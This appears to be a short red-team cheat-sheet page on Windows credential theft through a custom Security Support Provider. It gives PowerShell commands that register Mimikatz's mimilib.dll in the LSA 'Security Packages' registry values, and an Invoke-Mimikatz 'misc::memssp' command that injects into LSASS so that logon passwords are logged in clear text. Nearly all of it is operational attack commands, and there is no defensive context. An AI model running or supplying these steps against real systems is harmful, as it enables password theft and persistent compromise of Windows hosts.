Custom SSP

Custom SSP

  • Security Support Provider (SSP) is a DLL which provides ways for application to obtain an authenticated connection. For example: NTLM, Kerberos, Wdigest, CredSSP.

  • Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.

We can either:

  • Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages' $packages += "mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name
'Security Packages' -Value $packages

OR:

  • Using Mimikatz, inject into LSASS

Invoke-Mimikatz -Command '"misc::memssp"'

Last updated